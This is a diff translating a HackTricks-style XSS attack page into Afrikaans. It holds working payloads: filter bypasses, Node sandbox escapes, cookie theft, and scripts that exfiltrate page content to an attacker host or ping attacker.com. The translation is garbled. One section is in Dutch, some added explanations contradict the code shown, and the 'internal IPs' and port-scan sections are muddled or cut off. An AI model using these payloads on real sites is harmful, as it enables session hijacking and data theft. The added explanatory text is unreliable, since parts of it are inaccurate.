``` - -From [**here**](https://portswigger.net/research/xss-in-hidden-input-fields): You can execute an **XSS payload inside a hidden attribute**, provided you can **persuade** the **victim** into pressing the **key combination**. On Firefox Windows/Linux the key combination is **ALT+SHIFT+X** and on OS X it is **CTRL+ALT+X**. You can specify a different key combination using a different key in the access key attribute. Here is the vector: - +Vanaf [**hier**](https://portswigger.net/research/xss-in-hidden-input-fields): Jy kan 'n **XSS-payload binne 'n verborge atribuut** uitvoer, mits jy die **slagoffer** kan **oortuig** om die **sleutelkombinasie** te druk. Op Firefox Windows/Linux is die sleutelkombinasie **ALT+SHIFT+X** en op OS X is dit **CTRL+ALT+X**. Jy kan 'n ander sleutelkombinasie spesifiseer deur 'n ander sleutel in die toegangssleutel-atribuut te gebruik. Hier is die vektor: ```markup ``` +**Die XSS-lading sal soos volg wees: `" accesskey="x" onclick="alert(1)" x="`** -**The XSS payload will be something like this: `" accesskey="x" onclick="alert(1)" x="`** +### Swartlys omseilings -### Blacklist Bypasses +Verskeie truuks met die gebruik van verskillende kodering is reeds in hierdie gedeelte blootgestel. Gaan **terug om te leer waar jy dit kan gebruik:** -Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use:** +* **HTML-kodering (HTML-etikette)** +* **Unicode-kodering (kan geldige JS-kode wees):** `\u0061lert(1)` +* **URL-kodering** +* **Hex- en oktaalkodering** +* **data-kodering** -* **HTML encoding (HTML tags)** -* **Unicode encoding (can be valid JS code):** `\u0061lert(1)` -* **URL encoding** -* **Hex and Octal encoding** -* **data encoding** +**Omseilings vir HTML-etikette en eienskappe** -**Bypasses for HTML tags and attributes** +Lees die [Swartlys omseilings van die vorige gedeelte](./#blacklist-bypasses). 
-Read the[ Blacklist Bypasses of the previous section](./#blacklist-bypasses). +**Omseilings vir JavaScript-kode** -**Bypasses for JavaScript code** - -Read the J[avaScript bypass blacklist of the following section](./#javascript-bypass-blacklists-techniques). +Lees die [JavaScript omseilingswartlys van die volgende gedeelte](./#javascript-bypass-blacklists-techniques). ### CSS-Gadgets -If you found a **XSS in a very small part** of the web that requires some kind of interaction (maybe a small link in the footer with an onmouseover element), you can try to **modify the space that element occupies** to maximize the probabilities of have the link fired. +As jy 'n **XSS in 'n baie klein deel** van die web gevind het wat enige vorm van interaksie vereis (miskien 'n klein skakel in die voetskrif met 'n onmouseover-element), kan jy probeer om **die spasie wat die element inneem te wysig** om die waarskynlikheid te maksimeer dat die skakel geaktiveer word. -For example, you could add some styling in the element like: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5` +Byvoorbeeld, jy kan enige stylings in die element byvoeg soos: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5` -But, if the WAF is filtering the style attribute, you can use CSS Styling Gadgets, so if you find, for example +Maar as die WAF die styl-eienskap filter, kan jy CSS Styling Gadgets gebruik. 
As jy byvoorbeeld die volgende vind: > .test {display:block; color: blue; width: 100%\} -and +en > \#someid {top: 0; font-family: Tahoma;} -Now you can modify our link and bring it to the form +Kan jy nou ons skakel wysig en dit na die vorm bring: > \ -This trick was taken from [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703) +Hierdie truuk is geneem van [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703) -## Injecting inside JavaScript code +## Injeksie binne JavaScript-kode -In these case you **input** is going to be **reflected inside the JS code** of a `.js` file or between `` tags or between HTML events that can execute JS code or between attributes that accepts the `javascript:` protocol. +In hierdie geval sal jou **inset** binne die JS-kode van 'n `.js`-lêer of tussen ``-etikette of tussen HTML-gebeure wat JS-kode kan uitvoer of tussen eienskappe wat die `javascript:`-protokol aanvaar, weerspieël word. -### Escaping \` you could easily **escape closing the `` ingevoeg word, kan jy maklik die sluiting van die ` ``` +Let wel dat ons in hierdie voorbeeld **nie eens die enkel aanhalingsteken gesluit het nie**. Dit is omdat **HTML-analise eers deur die blaaier uitgevoer word**, wat betrokke is by die identifisering van bladsyelemente, insluitend blokke van skrips. Die analisering van JavaScript om die ingeslote skrips te verstaan en uit te voer, word eers daarna uitgevoer. -Note that in this example we **haven't even closed the single quote**. This is because **HTML parsing is performed first by the browser**, which involves identifying page elements, including blocks of script. 
The parsing of JavaScript to understand and execute the embedded scripts is only carried out afterward. - -### Inside JS code - -If `<>` are being sanitised you can still **escape the string** where your input is being **located** and **execute arbitrary JS**. It's important to **fix JS syntax**, because if there are any errors, the JS code won't be executed: +### Binne JS-kode +As `<>` gesaniteer word, kan jy steeds die tekenreekse **ontvlug** waar jou insette **geplaas** word en **arbitrêre JS uitvoer**. Dit is belangrik om die JS-sintaksie **te herstel**, want as daar enige foute is, sal die JS-kode nie uitgevoer word nie: ``` '-alert(document.domain)-' ';alert(document.domain)// \';alert(document.domain)// ``` +### Sjabloonliterale \`\` -### Template literals \`\` - -In order to construct **strings** apart from single and double quotes JS also accepts **backticks** **` `` `** . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.\ -Therefore, if you find that your input is being **reflected** inside a JS string that is using backticks, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**: - -This can be **abused** using: +Om **strings** te konstrueer, aanvaar JS ook **backticks** **` `` `** afgesien van enkel- en dubbele aanhalingstekens. Dit staan bekend as sjabloonliterale omdat dit toelaat om **ingebedde JS-uitdrukkings** te gebruik deur middel van die sintaksis `${ ... }`.\ +Daarom, as jy vind dat jou inset binne 'n JS-string wat backticks gebruik, **weerspieël** word, kan jy die sintaksis `${ ... }` misbruik om **willekeurige JS-kode** uit te voer: +Dit kan **misbruik** word deur gebruik te maak van: ```javascript `${alert(1)}` `${`${`${`${alert(1)}`}`}`}` 
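Review bot: the in-page links in @@ -457,84 +454,76 @@ will stop resolving: `+Lees die [Swartlys omseilings van die vorige gedeelte](./#blacklist-bypasses).` and `+Lees die [JavaScript omseilingswartlys van die volgende gedeelte](./#javascript-bypass-blacklists-techniques).` keep the English fragments, but GitBook derives the anchor from the heading text, and the heading `Blacklist Bypasses` is translated in this same patch (`+### Swartlys Verbygaan` earlier in the file, `+### Swartlys omseilings` here). Either keep those headings in English or update the fragments to match the translated headings, and check the second fragment the same way. Separately, "Blacklist Bypasses" is translated two different ways (`Swartlys Verbygaan` vs `Swartlys omseilings`); use one form throughout.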
@@ -545,28 +534,49 @@ This can be **abused** using: function loop(){return loop} loop`````````````` ``````````````` +### Gekodeerde kode-uitvoering -### Encoded code execution +In sommige gevallen kan een aanvaller proberen om kwaadaardige code uit te voeren door deze te coderen voordat deze naar de server wordt verzonden. Dit kan worden gedaan om detectie te voorkomen of om beveiligingsmaatregelen te omzeilen. +Een veelvoorkomende techniek is het gebruik van URL-encodering om speciale tekens te vervangen door hun hexadecimale equivalent. Bijvoorbeeld, de code `` kan worden gecodeerd als `%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E`. + +Deze gecodeerde code kan vervolgens worden ingevoegd in een kwetsbaar veld op een webpagina, zoals een invoerveld of een querystring-parameter. Wanneer de server de gecodeerde code ontvangt en decodeert, wordt de kwaadaardige code uitgevoerd. + +Om deze techniek te misbruiken, moet de aanvaller weten hoe de server de gecodeerde invoer decodeert. Dit kan worden ontdekt door het bestuderen van de client-side code of door het uitvoeren van reverse engineering op de server-side code. + +Het is belangrijk voor ontwikkelaars om invoer correct te valideren en te saneren om dit soort aanvallen te voorkomen. Het gebruik van een Content Security Policy (CSP) kan ook helpen bij het beperken van de impact van gecodeerde code-uitvoering. ```markup ``` +**Javascript binne 'n kommentaar** -**Javascript inside a comment** +Wanneer 'n kommentaarveld op 'n webwerf nie behoorlik gevalideer word nie, kan dit 'n potensiële veiligheidsrisiko skep. 'n Aanvaller kan kwaadwillige Javascript-kode insluit binne 'n kommentaarveld, wat uitgevoer kan word wanneer die webwerf dit verwerk. Hierdie tipe aanval staan bekend as 'n XSS (Cross-Site Scripting) aanval. 
+Om hierdie tipe aanval uit te voer, kan 'n aanvaller die volgende kode insluit binne 'n kommentaarveld: + +```html + +``` + +Wanneer die webwerf hierdie kommentaarveld verwerk, sal die Javascript-kode uitgevoer word en 'n waarskuwing met die teks "XSS aanval" sal vertoon word. Dit kan gevaarlik wees, veral as die aanvaller kwaadwillige kode insluit wat persoonlike inligting steel of die webwerf se funksionaliteit ontwrig. + +Om XSS-aanvalle te voorkom, moet webwerwe behoorlike invoervalidering en ontsmetting toepas op alle gebruikersinsette, insluitend kommentaarvelde. Dit sal help om die uitvoering van kwaadwillige kode te voorkom en die veiligheid van die webwerf te verseker. ```javascript //If you can only inject inside a JS comment, you can still leak something //If the user opens DevTools request to the indicated sourceMappingURL will be send //# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com ``` +**JavaScript sonder hakies** -**JavaScript without parentheses** +In JavaScript is dit moontlik om 'n funksie op te roep sonder om hakies te gebruik. Hierdie tegniek maak gebruik van die feit dat JavaScript die funksie self as 'n waarde behandel. +Byvoorbeeld, in plaas van `myFunction()`, kan jy `myFunction` skryf. Hierdie sintaksis sal die funksie nie onmiddellik uitvoer nie, maar eerder die funksie self as 'n waarde teruggee. + +Dit kan nuttig wees in sekere situasies, soos wanneer jy 'n funksie wil deurgee as 'n argument na 'n ander funksie. + +Dit is belangrik om op te let dat hierdie tegniek slegs werk as die funksie geen argumente aanvaar nie. As die funksie argumente vereis, sal jy steeds hakies moet gebruik. 
````javascript // By setting location window.location='javascript:alert\x281\x29' x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x - // or any DOMXSS sink such as location=name +// or any DOMXSS sink such as location=name // Backtips - // Backtips pass the string as an array of lenght 1 +// Backtips pass the string as an array of lenght 1 alert`1` // Backtips + Tagged Templates + call/apply 
@@ -675,35 +712,35 @@ eval.apply`${[`alert\x281\x29`]}` [].sort.call`${alert}1337` [].map.call`${eval}\\u{61}lert\x281337\x29` - // To pass several arguments you can use +// To pass several arguments you can use function btt(){ - console.log(arguments); +console.log(arguments); } btt`${'arg1'}${'arg2'}${'arg3'}` - //It's possible to construct a function and call it +//It's possible to construct a function and call it Function`x${'alert(1337)'}x``` - // .replace can use regexes and call a function if something is found +// .replace can use regexes and call a function if something is found "a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a," "a".replace.call`1${/./}${alert}` - // This happened in the previous example - // Change "this" value of call to "1," - // match anything with regex /./ - // call alert with "1" +// This happened in the previous example +// Change "this" value of call to "1," +// match anything with regex /./ +// call alert with "1" "a".replace.call`1337${/..../}${alert}` //alert with 1337 instead - // Using Reflect.apply to call any function with any argumnets +// Using Reflect.apply to call any function with any argumnets Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function. Reflect.apply.call`${navigation.navigate}${navigation}${[name]}` - // Using Reflect.set to call set any value to a variable +// Using Reflect.set to call set any value to a variable Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third. 
// valueOf, toString - // These operations are called when the object is used as a primitive - // Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used +// These operations are called when the object is used as a primitive +// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used valueOf=alert;window+'' toString=alert;window+'' 
@@ -715,28 +752,26 @@ onerror=eval;throw"=alert\x281\x29"; {onerror=eval}throw"=alert(1)" //No ";" onerror=alert //No ";" using new line throw 1337 - // Error handler + Special unicode separators -eval("onerror=\u2028alert\u2029throw 1337"); - // Error handler + Comma separator - // The comma separator goes through the list and returns only the last element +// Error handler + Special unicode separators +eval("onerror=\u2028alert\u2029throw 1337"); +// Error handler + Comma separator +// The comma separator goes through the list and returns only the last element var a = (1,2,3,4,5,6) // a = 6 throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert throw onerror=alert,1,1,1,1,1,1337 - // optional exception variables inside a catch clause. +// optional exception variables inside a catch clause. try{throw onerror=alert}catch{throw 1} // Has instance symbol 'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval} 'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval} - // The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol. +// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol. ```` - * [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md) * [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix) -**Arbitrary function (alert) call** - +**Willekeurige funksie (alert) oproep** ````javascript //Eval like functions eval('ale'+'rt(1)') 
@@ -750,8 +785,8 @@ import('data:text/javascript,alert(1)') //General function executions `` //Can be use as parenthesis alert`document.cookie` -alert(document['cookie']) -with(document)alert(cookie) +alert(document['cookie']) +with(document)alert(cookie) (alert)(1) (alert(1))in"." a=alert,a(1) 
@@ -796,50 +831,68 @@ top['al\x65rt'](1) top[8680439..toString(30)](1) ```` +## **DOM kwesbaarhede** -## **DOM vulnerabilities** - -There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.\ -**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:** +Daar is **JS-kode** wat **onveilig deur 'n aanvaller beheerde data** soos `location.href` gebruik. 'n Aanvaller kan dit misbruik om willekeurige JS-kode uit te voer.\ +**As gevolg van die uitbreiding van die verduideliking van** [**DOM kwesbaarhede is dit na hierdie bladsy verskuif**](dom-xss.md)**:** {% content-ref url="dom-xss.md" %} [dom-xss.md](dom-xss.md) {% endcontent-ref %} -There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.\ -Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering). +Daar sal jy 'n gedetailleerde **verduideliking van wat DOM kwesbaarhede is, hoe hulle veroorsaak word, en hoe om dit uit te buit** vind.\ +Moenie ook vergeet dat **aan die einde van die genoemde pos** 'n verduideliking oor [**DOM Clobbering-aanvalle**](dom-xss.md#dom-clobbering) gevind kan word. -## Other Bypasses +## Ander omseilings -### Normalised Unicode +### Gestandaardiseerde Unicode -You could check is the **reflected values** are being **unicode normalized** in the server (or in the client side) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-injection/#xss-cross-site-scripting). - -### PHP FILTER\_VALIDATE\_EMAIL flag Bypass +Jy kan nagaan of die **weerspieëlde waardes** in die bediener (of aan die kliëntkant) **genormaliseerde Unicode** is en hierdie funksionaliteit misbruik om beskerming te omseil. 
[**Vind 'n voorbeeld hier**](../unicode-injection/#xss-cross-site-scripting). +### PHP FILTER\_VALIDATE\_EMAIL-vlag omseiling ```javascript ">"@x.y ``` +### Ruby-On-Rails omseiling -### Ruby-On-Rails bypass - -Due to **RoR mass assignment** quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag.\ -Form example ([from this report](https://hackerone.com/reports/709336)), if you send the payload: - +As gevolg van **RoR massa-toewysing** word aanhalingstekens ingevoeg in die HTML en dan word die aanhalingstekenbeperking omseil en addisionele velde (onfocus) kan binne die tag bygevoeg word.\ +Vormvoorbeeld ([van hierdie verslag](https://hackerone.com/reports/709336)), as jy die lading stuur: ``` contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa ``` - -The pair "Key","Value" will be echoed back like this: - +Die paar "Key","Value" sal soos volg teruggestuur word: ``` {" onfocus=javascript:alert('xss') autofocus a"=>"a"} ``` +### Spesiale kombinasies -Then, the onfocus attribute will be inserted and XSS occurs. +In some cases, the onfocus attribute can be combined with other HTML attributes to create more complex XSS attacks. Here are some examples: -### Special combinations +#### 1. onfocus + onload +```html + 
@@ -999,23 +1040,21 @@ If the page is returnin a text/xml content-type it's possible to indicate a name ``` +### Spesiale Vervangingspatrone -### Special Replacement Patterns +Wanneer iets soos **`"some {{template}} data".replace("{{template}}", )`** gebruik word. Die aanvaller kan [**spesiale stringvervanging**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement) gebruik om te probeer om sekere beskermings te omseil: ``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))`` -When something like **`"some {{template}} data".replace("{{template}}", )`** is used. The attacker could use [**special string replacements**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement) to try to bypass some protections: ``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))`` +Byvoorbeeld in [**hierdie skryfstuk**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), is dit gebruik om 'n JSON-string binne 'n skripsie te ontsnap en willekeurige kode uit te voer. -For example in [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), this was used to **scape a JSON string** inside a script and execute arbitrary code. 
- -### Chrome Cache to XSS +### Chrome Cache na XSS {% content-ref url="chrome-cache-to-xss.md" %} [chrome-cache-to-xss.md](chrome-cache-to-xss.md) {% endcontent-ref %} -### XS Jails Escape - -If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems: +### XS Jails Ontsnapping +As jy slegs 'n beperkte stel karakters het om te gebruik, kyk na hierdie ander geldige oplossings vir XSJail-probleme: ```javascript // eval + unescape + regex eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))() 
@@ -1024,49 +1063,44 @@ eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequir // use of with with(console)log(123) with(/console.log(1)/)with(this)with(constructor)constructor(source)() - // Just replace console.log(1) to the real code, the code we want to run is: - //return String(process.mainModule.require('fs').readFileSync('flag.txt')) +// Just replace console.log(1) to the real code, the code we want to run is: +//return String(process.mainModule.require('fs').readFileSync('flag.txt')) with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt'))) with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n))) with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n))) - //Final solution +//Final solution with( - /with(String) - with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process) - with(mainModule) - with(require(k)) - return(String(readFileSync(n))) - /) +/with(String) +with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process) +with(mainModule) +with(require(k)) +return(String(readFileSync(n))) +/) with(this) - with(constructor) - constructor(source)() +with(constructor) +constructor(source)() // For more uses of with go to challenge misc/CaaSio PSE in // https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE ``` +As **alles ongedefinieerd is** voor die uitvoering van onbetroubare kode (soos in [**hierdie verslag**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)), is dit moontlik om nuttige objekte "uit niks" te genereer om die uitvoering van willekeurige onbetroubare kode te misbruik: -If **everything is undefined** before executing untrusted code (like in [**this 
writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code: - -* Using import() - +* Deur import() te gebruik ```javascript // although import "fs" doesn’t work, import('fs') does. import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8"))) ``` +* Toegang tot `require` op 'n indirekte manier -* Accessing `require` indirectly - -[According to this](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules are wrapped by Node.js within a function, like this: - +[Volgens hierdie](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) word modules deur Node.js binne 'n funksie gewikkel, soos hierdie: ```javascript (function (exports, require, module, __filename, __dirname) { - // our actual module code +// our actual module code }); ``` - -Therefore, if from that module we can **call another function**, it's possible to use `arguments.callee.caller.arguments[1]` from that function to access **`require`**: +Daarom, as ons van daardie module **'n ander funksie kan oproep**, is dit moontlik om `arguments.callee.caller.arguments[1]` van daardie funksie te gebruik om toegang te verkry tot **`require`**: {% code overflow="wrap" %} ```javascript 
@@ -1074,65 +1108,62 @@ Therefore, if from that module we can **call another function**, it's possible t ``` {% endcode %} -In a similar way to the previous example, it's possible to **use error handlers** to access the **wrapper** of the module and get the **`require`** function: - +Op 'n soortgelyke manier as die vorige voorbeeld, is dit moontlik om **fouthanteraars te gebruik** om toegang te verkry tot die **wrapping** van die module en die **`require`**-funksie te kry: ```javascript try { - null.f() +null.f() } catch (e) { - TypeError = e.constructor +TypeError = e.constructor } Object = {}.constructor String = ''.constructor Error = TypeError.prototype.__proto__.constructor function CustomError() { - const oldStackTrace = Error.prepareStackTrace - try { - Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace - Error.captureStackTrace(this) - this.stack - } finally { - Error.prepareStackTrace = oldStackTrace - } +const oldStackTrace = Error.prepareStackTrace +try { +Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace +Error.captureStackTrace(this) +this.stack +} finally { +Error.prepareStackTrace = oldStackTrace +} } function trigger() { - const err = new CustomError() - console.log(err.stack[0]) - for (const x of err.stack) { - // use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter - const fn = x.getFunction() - console.log(String(fn).slice(0, 200)) - console.log(fn?.arguments) - console.log('='.repeat(40)) - if ((args = fn?.arguments)?.length > 0) { - req = args[1] - console.log(req('child_process').execSync('id').toString()) - } - } +const err = new CustomError() +console.log(err.stack[0]) +for (const x of err.stack) { +// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter +const fn = x.getFunction() +console.log(String(fn).slice(0, 
200)) +console.log(fn?.arguments) +console.log('='.repeat(40)) +if ((args = fn?.arguments)?.length > 0) { +req = args[1] +console.log(req('child_process').execSync('id').toString()) +} +} } trigger() ``` +### Verduistering en Gevorderde Omzeiling -### Obfuscation & Advanced Bypass - -* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) +* **Verskillende verduisteringsmetodes op een bladsy:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) * [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js) * [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs) * [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com) * [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/) * [http://www.jsfuck.com/](http://www.jsfuck.com) -* More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) +* Meer gesofistikeerde JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) * [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html) * [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html) * [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses) - ```javascript //Katana ``` ```javascript -//JJencode +//JJencode ``` 
@@ -1149,17 +1180,15 @@ trigger() ```javascript // It's also possible to execute JS code only with the chars: []`+!${} ``` +## XSS algemene payloads -## XSS common payloads - -### Several payloads in 1 +### Verskeie payloads in 1 {% content-ref url="steal-info-js.md" %} [steal-info-js.md](steal-info-js.md) {% endcontent-ref %} -### Retrieve Cookies - +### Haal Koekies op ```javascript /?c="+document.cookie> 
@@ -1181,28 +1210,44 @@ trigger() ``` - {% hint style="info" %} -You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies/#httponly) if you are lucky enough. +Jy **sal nie toegang hê tot die koekies vanaf JavaScript** as die HTTPOnly-vlag in die koekie ingestel is nie. Maar hier het jy [sommige maniere om hierdie beskerming te omseil](../hacking-with-cookies/#httponly) as jy gelukkig genoeg is. {% endhint %} -### Steal Page Content - +### Steel Bladsy-inhoud ```javascript var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"; var attacker = "http://10.10.14.8/exfil"; var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { - if (xhr.readyState == XMLHttpRequest.DONE) { - fetch(attacker + "?" + encodeURI(btoa(xhr.responseText))) - } +if (xhr.readyState == XMLHttpRequest.DONE) { +fetch(attacker + "?" + encodeURI(btoa(xhr.responseText))) +} } xhr.open('GET', url, true); xhr.send(null); ``` +### Vind interne IP-adresse -### Find internal IPs +Om interne IP-adresse te vind, kan jy die volgende tegnieke gebruik: +#### 1. DNS-terugvoer + +As jy toegang het tot 'n DNS-diens wat interne IP-adresse terugvoer, kan jy dit gebruik om die interne IP-adresse van 'n teikenstelsel te vind. Voer 'n DNS-navraag uit vir die teikenstelsel se domeinnaam en kyk na die terugvoer vir enige interne IP-adresse wat verskyn. + +#### 2. ARP-spoofing + +Deur ARP-spoofing te gebruik, kan jy die ARP-tabel van 'n teikenstelsel manipuleer om die interne IP-adresse van ander toestelle in die netwerk te sien. Deur die ARP-tabel te onderskep en te analiseer, kan jy die interne IP-adresse van die teikenstelsel en ander toestelle in die netwerk vind. + +#### 3. Netwerkkaartspoofing + +Met netwerkkaartspoofing kan jy jou netwerkkaart se MAC-adres vervals om toegang te verkry tot die interne netwerk. 
Deur jou netwerkkaart se MAC-adres te vervals, kan jy die interne IP-adresse van ander toestelle in die netwerk sien. + +#### 4. Netwerkverkenning + +Deur netwerkverkenningstegnieke soos portskandering en netwerkkaartspoofing te gebruik, kan jy die interne IP-adresse van toestelle in die netwerk identifiseer. Deur die netwerk te skandeer vir aktiewe toestelle en die IP-adresse te analiseer, kan jy die interne IP-adresse van die teikenstelsel vind. + +Onthou om altyd wettige en etiese hackingpraktyke te volg en slegs toestemming te verkry om hierdie tegnieke op 'n netwerk toe te pas. ```html ``` +### Poortskander (haal op) -### Port Scanner (fetch) +Hierdie tegniek maak gebruik van 'n fetch-versoek om te bepaal of 'n spesifieke poort oop of toe is op 'n teikenbediener. Dit kan nuttig wees tydens pentesting om te bepaal watter poorte oop is en moontlike aanvalsveilighede te identifiseer. +#### Gebruik + +Voer die volgende kode in die konsol van die webblaaier in: + +```javascript +fetch('http://target-server.com:port') + .then(response => { + if (response.ok) { + console.log('Poort is oop'); + } else { + console.log('Poort is toe'); + } + }) + .catch(error => { + console.log('Fout tydens versoek:', error); + }); +``` + +Vervang `target-server.com` met die teikenbediener se URL en `port` met die poortnommer wat jy wil skandeer. + +#### Opmerkings + +- Hierdie tegniek maak gebruik van die `fetch`-funksie in JavaScript om 'n HTTP-versoek na die teikenbediener te stuur. +- As die versoek suksesvol is en die teikenbediener 'n geldige antwoord gee (HTTP-statuskode 200), beteken dit dat die poort oop is. +- As die versoek nie suksesvol is nie (HTTP-statuskode 404, 500, ens.), beteken dit dat die poort toe is of dat daar 'n fout opgetree het. +- Dit is belangrik om te onthou dat hierdie tegniek slegs die status van die poort bepaal en nie die veiligheid van die teikenbediener self beoordeel nie. 
```javascript const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); } ``` +### Poortskander (websockets) -### Port Scanner (websockets) +Hierdie tegniek maak gebruik van websockets om 'n poortskandering uit te voer op 'n doelwitbediener. Websockets is 'n kommunikasieprotokol wat toelaat vir vol-duplex kommunikasie tussen 'n kliënt en 'n bediener oor 'n enkele TCP-verbinding. +#### Hoe werk dit? + +1. Die aanvaller stel 'n webtoepassing op wat websockets ondersteun. +2. Die aanvaller maak 'n verbinding met die webtoepassing en stel 'n websockets-kanaal op. +3. Die aanvaller stuur 'n versoek na die doelwitbediener se poort om te kyk of dit oop of gesluit is. +4. As die poort oop is, sal die bediener 'n suksesvolle verbinding bevestig. +5. Die aanvaller kan dan die resultate van die poortskandering analiseer en verdere aanvalstegnieke implementeer. + +#### Voordele + +- Websockets maak dit moontlik om poortskandering uit te voer sonder om 'n eksterne skanderingshulpmiddel te gebruik. +- Dit kan nuttig wees in situasies waar 'n tradisionele poortskandering geblokkeer word, maar websockets toegelaat word. + +#### Beperkings + +- Hierdie tegniek is afhanklik van die doelwitbediener wat websockets ondersteun. +- Dit kan slegs gebruik word om die status van 'n enkele poort te bepaal en nie om 'n volledige skandering van alle poorte uit te voer nie. + +#### Voorbeeld + +```html + +``` + +In hierdie voorbeeld maak die aanvaller 'n websockets-verbinding met die doelwitbediener en stuur 'n HTTP-versoek na die doelwitbediener se poort. As die bediener 'n suksesvolle verbinding bevestig 